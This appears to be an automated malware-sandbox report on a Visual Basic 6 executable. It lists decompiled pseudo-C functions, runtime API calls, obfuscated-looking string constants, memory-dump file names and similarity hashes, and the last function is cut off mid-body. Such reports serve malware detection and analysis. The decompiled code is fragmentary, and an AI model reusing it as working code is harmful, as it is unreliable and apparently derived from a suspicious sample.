__vbaFreeVar.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,Barer,HEKTOMETEREN), ref: 0042787C
__vbaNew2.MSVBVM60(0040342C,00435744,00008008,?,?,?,?,?,?,?,?,?,?,Barer,HEKTOMETEREN), ref: 004278A0
__vbaCastObj.MSVBVM60(?,00403260,CALASTIC,?,?,00008008,?,?,?,?,?,?,?,?,?,?), ref: 004278CA
__vbaObjSet.MSVBVM60(?,00000000,?,00403260,CALASTIC,?,?,00008008,?), ref: 004278D4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040341C,00000040,?,?,00008008,?), ref: 004278FD
__vbaFreeObj.MSVBVM60(?,?,00008008,?,?,?,?,?,?,?,?,?,?,Barer,HEKTOMETEREN), ref: 0042790E
__vbaFreeObj.MSVBVM60(0042793E,00008008,?,?,?,?,?,?,?,?,?,?,Barer,HEKTOMETEREN), ref: 00427938

Strings

Barer, xrefs: 0042784F
DWC, xrefs: 004278B5
CALASTIC, xrefs: 004278BD
HEKTOMETEREN, xrefs: 0042784A

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#692CastCheckChkstkHresultNew2
String ID: Barer$CALASTIC$DWC$HEKTOMETEREN
API String ID: 2275300860-3942968734
Opcode ID: b8b5018227ee7c75c63d23767d9b9c95e78fe329e59ccb202243c4593b3cac7e
Instruction ID: faf9158c341b7ff1e753e4dee4e4f9332f367a0c31a5a8dcc5065370eb2f5d1e
Opcode Fuzzy Hash: b8b5018227ee7c75c63d23767d9b9c95e78fe329e59ccb202243c4593b3cac7e
Instruction Fuzzy Hash: 90310CB1D40258EFDB11EFE1C846BDEBBB8AF04705F60402BF101BA1A1D7785645DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004335AD, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E004335AD(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				short _v32;
				char _v48;
				void* _v52;
				char _v68;
				char _v84;
				void* _v88;
				intOrPtr* _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _t55;
				signed int _t60;
				char* _t63;
				char* _t64;
				char* _t66;
				void* _t72;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t82;

				_t82 = __fp0;
				_t75 = _t74 - 0xc;
				 *[fs:0x0] = _t75;
				L004015F0();
				_v16 = _t75;
				_v12 = 0x401580;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x64,  *[fs:0x0], 0x4015f6, _t72);
				if( *0x435744 != 0) {
					_v116 = 0x435744;
				} else {
					_push(0x435744);
					_push(0x40342c);
					L00401812();
					_v116 = 0x435744;
				}
				_t9 =  &_v116; // 0x435744
				_v92 =  *((intOrPtr*)( *_t9));
				_t55 =  *((intOrPtr*)( *_v92 + 0x14))(_v92,  &_v52);
				asm("fclex");
				_v96 = _t55;
				if(_v96 >= 0) {
					_v120 = _v120 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40341c);
					_push(_v92);
					_push(_v96);
					L00401800();
					_v120 = _t55;
				}
				_v100 = _v52;
				_t60 =  *((intOrPtr*)( *_v100 + 0x78))(_v100,  &_v88);
				asm("fclex");
				_v104 = _t60;
				if(_v104 >= 0) {
					_v124 = _v124 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x403784);
					_push(_v100);
					_push(_v104);
					L00401800();
					_v124 = _t60;
				}
				_v32 = _v88;
				L004017FA();
				_push(0);
				_push(L"Width");
				_push(0);
				_push(L"Opsione12");
				_push( &_v48);
				_t63 =  &_v68;
				_push(_t63);
				L00401830();
				_push(_t63);
				_t64 =  &_v84;
				_push(_t64);
				L004017E8();
				_push(_t64);
				L004016B0();
				_v28 = _t82;
				_push( &_v84);
				_t66 =  &_v68;
				_push(_t66);
				_push(2);
				L00401842();
				asm("wait");
				_push(0x43370f);
				L00401824();
				return _t66;
			}

0x004335ad
0x004335b0
0x004335bf
0x004335c9
0x004335d1
0x004335d4
0x004335db
0x004335ea
0x004335f4
0x0043360e
0x004335f6
0x004335f6
0x004335fb
0x00433600
0x00433605
0x00433605
0x00433615
0x0043361a
0x00433629
0x0043362c
0x0043362e
0x00433635
0x0043364e
0x00433637
0x00433637
0x00433639
0x0043363e
0x00433641
0x00433644
0x00433649
0x00433649
0x00433655
0x00433664
0x00433667
0x00433669
0x00433670
0x00433689
0x00433672
0x00433672
0x00433674
0x00433679
0x0043367c
0x0043367f
0x00433684
0x00433684
0x00433691
0x00433698
0x0043369d
0x0043369f
0x004336a4
0x004336a6
0x004336ae
0x004336af
0x004336b2
0x004336b3
0x004336bb
0x004336bc
0x004336bf
0x004336c0
0x004336c8
0x004336c9
0x004336ce
0x004336d4
0x004336d5
0x004336d8
0x004336d9
0x004336db
0x004336e3
0x004336e4
0x00433709
0x0043370e

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 004335C9
__vbaNew2.MSVBVM60(0040342C,00435744,?,?,?,?,004015F6), ref: 00433600
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040341C,00000014), ref: 00433644
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403784,00000078), ref: 0043367F
__vbaFreeObj.MSVBVM60(00000000,?,00403784,00000078), ref: 00433698
__vbaVarLateMemCallLdRf.MSVBVM60(?,?,Opsione12,00000000,Width,00000000), ref: 004336B3
__vbaVarLateMemCallLd.MSVBVM60(?,00000000,?,?,?,004015F6), ref: 004336C0
__vbaR4Var.MSVBVM60(00000000,?,?,?,?,?,?,?,004015F6), ref: 004336C9
__vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,?,?,?,?,?,?,?,004015F6), ref: 004336DB
__vbaFreeVar.MSVBVM60(0043370F,?,?,00000000,?,?,?,?,?,?,?,004015F6), ref: 00433709

Strings

Width, xrefs: 0043369F
Opsione12, xrefs: 004336A6
DWC, xrefs: 00433615

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CallCheckHresultLate$ChkstkListNew2
String ID: DWC$Opsione12$Width
API String ID: 242139645-2076894493
Opcode ID: 3d6833ba83a1a440bb669f083f88cc912648966de754cffe10b6cfa170047e8e
Instruction ID: 9bc4ab3a04bdebe2e167e67ede0ec49e2b54dbf05f87faac08bc984ddc99114a
Opcode Fuzzy Hash: 3d6833ba83a1a440bb669f083f88cc912648966de754cffe10b6cfa170047e8e
Instruction Fuzzy Hash: F041F8B1D00218EFCB11EFE5CC46B9EBBB9BB08705F20402AF105BB2A1D7785A459B58

Uniqueness

Uniqueness Score: -1.00%

Function 0042CD4B, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0042CD4B(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v40;
				char _v60;
				intOrPtr _v68;
				char _v76;
				intOrPtr _v84;
				char _v92;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v116;
				char _v124;
				intOrPtr _v132;
				char _v140;
				intOrPtr _v148;
				char _v156;
				char* _v164;
				char _v172;
				short _v272;
				short _t50;
				char* _t51;
				intOrPtr _t80;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t80;
				L004015F0();
				_v12 = _t80;
				_v8 = 0x401440;
				L00401794();
				_push(1);
				_push( &_v60);
				L00401746();
				_v164 = 0x4037ac;
				_v172 = 0x8008;
				_push( &_v60);
				_t50 =  &_v172;
				_push(_t50);
				L0040181E();
				_v272 = _t50;
				L00401824();
				_t51 = _v272;
				if(_t51 != 0) {
					_v148 = 0x80020004;
					_v156 = 0xa;
					_v132 = 0x80020004;
					_v140 = 0xa;
					_v116 = 0x80020004;
					_v124 = 0xa;
					_v100 = 0x80020004;
					_v108 = 0xa;
					_v84 = 0x80020004;
					_v92 = 0xa;
					_v68 = 0x80020004;
					_v76 = 0xa;
					_v164 = L"Unpliancy";
					_v172 = 8;
					L00401794();
					_push( &_v156);
					_push( &_v140);
					_push( &_v124);
					_push( &_v108);
					_push( &_v92);
					_push( &_v76);
					_push( &_v60);
					L00401836();
					L0040183C();
					_push( &_v156);
					_push( &_v140);
					_push( &_v124);
					_push( &_v108);
					_push( &_v92);
					_push( &_v76);
					_t51 =  &_v60;
					_push(_t51);
					_push(7);
					L00401842();
				}
				asm("wait");
				_push(0x42cef4);
				L0040182A();
				L00401824();
				return _t51;
			}

0x0042cd50
0x0042cd5b
0x0042cd5c
0x0042cd68
0x0042cd70
0x0042cd73
0x0042cd80
0x0042cd85
0x0042cd8a
0x0042cd8b
0x0042cd90
0x0042cd9a
0x0042cda7
0x0042cda8
0x0042cdae
0x0042cdaf
0x0042cdb4
0x0042cdbe
0x0042cdc3
0x0042cdcc
0x0042cdd2
0x0042cddc
0x0042cde6
0x0042cded
0x0042cdf7
0x0042cdfe
0x0042ce05
0x0042ce0c
0x0042ce13
0x0042ce1a
0x0042ce21
0x0042ce28
0x0042ce2f
0x0042ce39
0x0042ce4c
0x0042ce57
0x0042ce5e
0x0042ce62
0x0042ce66
0x0042ce6a
0x0042ce6e
0x0042ce72
0x0042ce73
0x0042ce7d
0x0042ce88
0x0042ce8f
0x0042ce93
0x0042ce97
0x0042ce9b
0x0042ce9f
0x0042cea0
0x0042cea3
0x0042cea4
0x0042cea6
0x0042ceab
0x0042ceae
0x0042ceaf
0x0042cee6
0x0042ceee
0x0042cef3

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042CD68
__vbaVarDup.MSVBVM60(?,?,?,?,004015F6), ref: 0042CD80
#526.MSVBVM60(?,00000001,?,?,?,?,004015F6), ref: 0042CD8B
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0042CDAF
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0042CDBE
__vbaVarDup.MSVBVM60(00008008,?), ref: 0042CE4C
#596.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,00008008,?), ref: 0042CE73
__vbaStrMove.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,00008008,?), ref: 0042CE7D
__vbaFreeVarList.MSVBVM60(00000007,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,00008008), ref: 0042CEA6
__vbaFreeStr.MSVBVM60(0042CEF4,00008008,?), ref: 0042CEE6
__vbaFreeVar.MSVBVM60(0042CEF4,00008008,?), ref: 0042CEEE

Strings

Unpliancy, xrefs: 0042CE2F

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#526#596ChkstkListMove
String ID: Unpliancy
API String ID: 2873101572-3121295256
Opcode ID: fda3ec569c33c8ad4f7bbb919676cb22ef2760d77a3e49760131ec2e6bac5c56
Instruction ID: b423e98b0a112bc8e5892ecaa08e73d7ed346a6f8dd1f4b4924f40263d76d636
Opcode Fuzzy Hash: fda3ec569c33c8ad4f7bbb919676cb22ef2760d77a3e49760131ec2e6bac5c56
Instruction Fuzzy Hash: 9A41D7B290025CAADB11DF91C881BDEBBBCFF05304F50816AE109B7191EB795A89CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0042C9BD, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0042C9BD(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v32;
				char _v48;
				char _v64;
				intOrPtr _v88;
				intOrPtr _v96;
				intOrPtr _v104;
				char _v112;
				void* _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				char _v136;
				signed int _v140;
				signed int _v144;
				short _t53;
				signed int _t56;
				signed int _t62;
				intOrPtr _t78;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t78;
				_push(0x7c);
				L004015F0();
				_v12 = _t78;
				_v8 = 0x401420;
				_v88 = 0x4034b4;
				_v96 = 8;
				L00401794();
				_push(2);
				_push( &_v48);
				_push( &_v64);
				L0040174C();
				_v104 = 0x4034c0;
				_v112 = 0x8008;
				_push( &_v64);
				_t53 =  &_v112;
				_push(_t53);
				L0040181E();
				_v116 = _t53;
				_push( &_v64);
				_push( &_v48);
				_push(2);
				L00401842();
				_t56 = _v116;
				if(_t56 != 0) {
					if( *0x435744 != 0) {
						_v136 = 0x435744;
					} else {
						_push(0x435744);
						_push(0x40342c);
						L00401812();
						_v136 = 0x435744;
					}
					_t19 =  &_v136; // 0x435744
					_v116 =  *((intOrPtr*)( *_t19));
					_t62 =  *((intOrPtr*)( *_v116 + 0x4c))(_v116,  &_v32);
					asm("fclex");
					_v120 = _t62;
					if(_v120 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x40341c);
						_push(_v116);
						_push(_v120);
						L00401800();
						_v140 = _t62;
					}
					_v124 = _v32;
					_v88 = 1;
					_v96 = 2;
					L004015F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t56 =  *((intOrPtr*)( *_v124 + 0x2c))(_v124, 0x10);
					asm("fclex");
					_v128 = _t56;
					if(_v128 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x2c);
						_push(0x403494);
						_push(_v124);
						_push(_v128);
						L00401800();
						_v144 = _t56;
					}
					L004017FA();
				}
				asm("wait");
				_push(0x42cb4f);
				return _t56;
			}

0x0042c9c2
0x0042c9cd
0x0042c9ce
0x0042c9d5
0x0042c9d8
0x0042c9e0
0x0042c9e3
0x0042c9ea
0x0042c9f1
0x0042c9fe
0x0042ca03
0x0042ca08
0x0042ca0c
0x0042ca0d
0x0042ca12
0x0042ca19
0x0042ca23
0x0042ca24
0x0042ca27
0x0042ca28
0x0042ca2d
0x0042ca34
0x0042ca38
0x0042ca39
0x0042ca3b
0x0042ca43
0x0042ca49
0x0042ca56
0x0042ca73
0x0042ca58
0x0042ca58
0x0042ca5d
0x0042ca62
0x0042ca67
0x0042ca67
0x0042ca7d
0x0042ca85
0x0042ca94
0x0042ca97
0x0042ca99
0x0042caa0
0x0042cabc
0x0042caa2
0x0042caa2
0x0042caa4
0x0042caa9
0x0042caac
0x0042caaf
0x0042cab4
0x0042cab4
0x0042cac6
0x0042cac9
0x0042cad0
0x0042cada
0x0042cae4
0x0042cae5
0x0042cae6
0x0042cae7
0x0042caf0
0x0042caf3
0x0042caf5
0x0042cafc
0x0042cb18
0x0042cafe
0x0042cafe
0x0042cb00
0x0042cb05
0x0042cb08
0x0042cb0b
0x0042cb10
0x0042cb10
0x0042cb22
0x0042cb22
0x0042cb27
0x0042cb28
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042C9D8
__vbaVarDup.MSVBVM60 ref: 0042C9FE
#513.MSVBVM60(?,?,00000002), ref: 0042CA0D
__vbaVarTstNe.MSVBVM60(?,?,?,?,00000002), ref: 0042CA28
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,00000002), ref: 0042CA3B
__vbaNew2.MSVBVM60(0040342C,00435744), ref: 0042CA62
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040341C,0000004C), ref: 0042CAAF
__vbaChkstk.MSVBVM60(00000000,?,0040341C,0000004C), ref: 0042CADA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403494,0000002C), ref: 0042CB0B
__vbaFreeObj.MSVBVM60(00000000,?,00403494,0000002C), ref: 0042CB22

Strings

DWC, xrefs: 0042CA7D

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkFreeHresult$#513ListNew2
String ID: DWC
API String ID: 2065280758-2466064311
Opcode ID: bd9c66e9f0284464e63c1118e3f3dda88a1602f62e5e560eeab9e9be834b3191
Instruction ID: cf8d925863391423fe26fe1bcad1d37876881d0973eed3b05ac7cc15f216fb10
Opcode Fuzzy Hash: bd9c66e9f0284464e63c1118e3f3dda88a1602f62e5e560eeab9e9be834b3191
Instruction Fuzzy Hash: 0B412B71D00218EFDB11DFA1D845BDEBBB8BF04704F20806AE105BB1A2DB785A45DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0042D0FD, Relevance: 18.1, APIs: 12, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0042D0FD(void* __ebx, void* __ecx, void* __edi, void* __esi, long long __fp0, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long _v28;
				void* _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v56;
				char _v72;
				void* _v76;
				signed int _v80;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				char* _t43;
				char* _t44;
				char* _t48;
				signed int _t52;
				intOrPtr _t73;
				long long _t79;

				_t79 = __fp0;
				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_push(0x4c);
				L004015F0();
				_v12 = _t73;
				_v8 = 0x401470;
				L0040178E();
				_push(0x73ad);
				_t43 =  &_v72;
				_push(_t43);
				L00401734();
				_push(_t43);
				L0040173A();
				_v76 =  ~(0 | _t43 != 0x0000ffff);
				L00401824();
				_t44 = _v76;
				if(_t44 != 0) {
					if( *0x435010 != 0) {
						_v92 = 0x435010;
					} else {
						_push(0x435010);
						_push(0x402614);
						L00401812();
						_v92 = 0x435010;
					}
					_t48 =  &_v40;
					L0040180C();
					_v76 = _t48;
					_t52 =  *((intOrPtr*)( *_v76 + 0x158))(_v76,  &_v36, _t48,  *((intOrPtr*)( *((intOrPtr*)( *_v92)) + 0x304))( *_v92));
					asm("fclex");
					_v80 = _t52;
					if(_v80 >= 0) {
						_v96 = _v96 & 0x00000000;
					} else {
						_push(0x158);
						_push(0x403568);
						_push(_v76);
						_push(_v80);
						L00401800();
						_v96 = _t52;
					}
					_v88 = _v36;
					_v36 = _v36 & 0x00000000;
					_v48 = _v88;
					_v56 = 8;
					_push(2);
					_t44 =  &_v56;
					_push(_t44);
					L0040172E();
					_v28 = _t79;
					L004017FA();
					L00401824();
				}
				asm("wait");
				_push(0x42d24e);
				L0040182A();
				return _t44;
			}

0x0042d0fd
0x0042d102
0x0042d10d
0x0042d10e
0x0042d115
0x0042d118
0x0042d120
0x0042d123
0x0042d130
0x0042d135
0x0042d13a
0x0042d13d
0x0042d13e
0x0042d143
0x0042d144
0x0042d154
0x0042d15b
0x0042d160
0x0042d166
0x0042d173
0x0042d18d
0x0042d175
0x0042d175
0x0042d17a
0x0042d17f
0x0042d184
0x0042d184
0x0042d1a8
0x0042d1ac
0x0042d1b1
0x0042d1c0
0x0042d1c6
0x0042d1c8
0x0042d1cf
0x0042d1eb
0x0042d1d1
0x0042d1d1
0x0042d1d6
0x0042d1db
0x0042d1de
0x0042d1e1
0x0042d1e6
0x0042d1e6
0x0042d1f2
0x0042d1f5
0x0042d1fc
0x0042d1ff
0x0042d206
0x0042d208
0x0042d20b
0x0042d20c
0x0042d211
0x0042d217
0x0042d21f
0x0042d21f
0x0042d224
0x0042d225
0x0042d248
0x0042d24d

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042D118
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 0042D130
__vbaVarErrI4.MSVBVM60(?,000073AD,?,?,?,?,004015F6), ref: 0042D13E
#559.MSVBVM60(00000000,?,000073AD,?,?,?,?,004015F6), ref: 0042D144
__vbaFreeVar.MSVBVM60(00000000,?,000073AD,?,?,?,?,004015F6), ref: 0042D15B
__vbaNew2.MSVBVM60(00402614,00435010,00000000,?,000073AD,?,?,?,?,004015F6), ref: 0042D17F
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042D1AC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403568,00000158), ref: 0042D1E1
#600.MSVBVM60(00000008,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042D20C
__vbaFreeObj.MSVBVM60(00000008,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042D217
__vbaFreeVar.MSVBVM60(00000008,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042D21F
__vbaFreeStr.MSVBVM60(0042D24E,00000000,?,000073AD,?,?,?,?,004015F6), ref: 0042D248

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#559#600CheckChkstkCopyHresultNew2
String ID:
API String ID: 2517472382-0
Opcode ID: 4de384a4ca005a48911a747c61ba66343cd15654b053c57fe9e83aad22ebdda4
Instruction ID: ab0d8e7968a5e5a99029a35bc0fcf3f58e168ea8a69c3133dc4c28d0636c207f
Opcode Fuzzy Hash: 4de384a4ca005a48911a747c61ba66343cd15654b053c57fe9e83aad22ebdda4
Instruction Fuzzy Hash: FB311D75D00248EFCB04EFE5C946BEEBBB8AF08704F50442AF101BB1A1DB795A46DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042C288, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0042C288(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v72;
				signed int _v76;
				char _v80;
				signed int _v84;
				signed int _v88;
				char* _t57;
				signed int _t61;
				signed int _t67;
				signed int _t71;
				char* _t73;
				intOrPtr _t84;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t84;
				_push(0x44);
				L004015F0();
				_v12 = _t84;
				_v8 = 0x4013f0;
				if( *0x435010 != 0) {
					_v72 = 0x435010;
				} else {
					_push(0x435010);
					_push(0x402614);
					L00401812();
					_v72 = 0x435010;
				}
				_t57 =  &_v36;
				L0040180C();
				_v44 = _t57;
				_t61 =  *((intOrPtr*)( *_v44 + 0x108))(_v44,  &_v32, _t57,  *((intOrPtr*)( *((intOrPtr*)( *_v72)) + 0x310))( *_v72));
				asm("fclex");
				_v48 = _t61;
				if(_v48 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x403568);
					_push(_v44);
					_push(_v48);
					L00401800();
					_v76 = _t61;
				}
				if( *0x435744 != 0) {
					_v80 = 0x435744;
				} else {
					_push(0x435744);
					_push(0x40342c);
					L00401812();
					_v80 = 0x435744;
				}
				_t23 =  &_v80; // 0x435744
				_v52 =  *((intOrPtr*)( *_t23));
				_t67 =  *((intOrPtr*)( *_v52 + 0x14))(_v52,  &_v40);
				asm("fclex");
				_v56 = _t67;
				if(_v56 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40341c);
					_push(_v52);
					_push(_v56);
					L00401800();
					_v84 = _t67;
				}
				_v60 = _v40;
				_t71 =  *((intOrPtr*)( *_v60 + 0x138))(_v60, _v32, 1);
				asm("fclex");
				_v64 = _t71;
				if(_v64 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x138);
					_push(0x403784);
					_push(_v60);
					_push(_v64);
					L00401800();
					_v88 = _t71;
				}
				L0040182A();
				_push( &_v40);
				_t73 =  &_v36;
				_push(_t73);
				_push(2);
				L004017A0();
				_push(0x42c41c);
				return _t73;
			}

0x0042c28d
0x0042c298
0x0042c299
0x0042c2a0
0x0042c2a3
0x0042c2ab
0x0042c2ae
0x0042c2bc
0x0042c2d6
0x0042c2be
0x0042c2be
0x0042c2c3
0x0042c2c8
0x0042c2cd
0x0042c2cd
0x0042c2f1
0x0042c2f5
0x0042c2fa
0x0042c309
0x0042c30f
0x0042c311
0x0042c318
0x0042c334
0x0042c31a
0x0042c31a
0x0042c31f
0x0042c324
0x0042c327
0x0042c32a
0x0042c32f
0x0042c32f
0x0042c33f
0x0042c359
0x0042c341
0x0042c341
0x0042c346
0x0042c34b
0x0042c350
0x0042c350
0x0042c360
0x0042c365
0x0042c374
0x0042c377
0x0042c379
0x0042c380
0x0042c399
0x0042c382
0x0042c382
0x0042c384
0x0042c389
0x0042c38c
0x0042c38f
0x0042c394
0x0042c394
0x0042c3a0
0x0042c3b0
0x0042c3b6
0x0042c3b8
0x0042c3bf
0x0042c3db
0x0042c3c1
0x0042c3c1
0x0042c3c6
0x0042c3cb
0x0042c3ce
0x0042c3d1
0x0042c3d6
0x0042c3d6
0x0042c3e2
0x0042c3ea
0x0042c3eb
0x0042c3ee
0x0042c3ef
0x0042c3f1
0x0042c3f9
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042C2A3
__vbaNew2.MSVBVM60(00402614,00435010,?,?,?,?,004015F6), ref: 0042C2C8
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042C2F5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403568,00000108), ref: 0042C32A
__vbaNew2.MSVBVM60(0040342C,00435744), ref: 0042C34B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040341C,00000014), ref: 0042C38F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403784,00000138), ref: 0042C3D1
__vbaFreeStr.MSVBVM60 ref: 0042C3E2
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0042C3F1

Strings

DWC, xrefs: 0042C360

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2$ChkstkList
String ID: DWC
API String ID: 3534970231-2466064311
Opcode ID: 39e377aceb96a10ef6cc8cd29f4269e8035ac772957e3ab54ac52c0376658a6f
Instruction ID: effc3754a79ef3c9190412a29d81d543c7c825d1e59a67a089149a4d95755952
Opcode Fuzzy Hash: 39e377aceb96a10ef6cc8cd29f4269e8035ac772957e3ab54ac52c0376658a6f
Instruction Fuzzy Hash: 4C4127B5D40218EFCB00EF95D885BDDBBB5BF08305F60842AF401BB2A0C7B95A45DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042CB6A, Relevance: 16.6, APIs: 11, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0042CB6A(void* __ebx, void* __ecx, void* __edi, void* __esi, char __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v28;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				char _v68;
				intOrPtr _v76;
				short _v80;
				intOrPtr* _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				intOrPtr* _v104;
				signed int _v108;
				intOrPtr* _v112;
				short _v116;
				char _v120;
				signed int _v124;
				char* _t58;
				signed int _t62;
				char* _t66;
				signed int _t73;
				char* _t75;
				intOrPtr _t83;
				intOrPtr _t94;
				char _t100;

				_t100 = __fp0;
				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t94;
				_push(0x68);
				L004015F0();
				_v12 = _t94;
				_v8 = 0x401430;
				if( *0x435010 != 0) {
					_v104 = 0x435010;
				} else {
					_push(0x435010);
					_push(0x402614);
					L00401812();
					_v104 = 0x435010;
				}
				_t58 =  &_v24;
				L0040180C();
				_v84 = _t58;
				_t62 =  *((intOrPtr*)( *_v84 + 0x180))(_v84,  &_v80, _t58,  *((intOrPtr*)( *((intOrPtr*)( *_v104)) + 0x308))( *_v104));
				asm("fclex");
				_v88 = _t62;
				if(_v88 >= 0) {
					_v108 = _v108 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x403568);
					_push(_v84);
					_push(_v88);
					L00401800();
					_v108 = _t62;
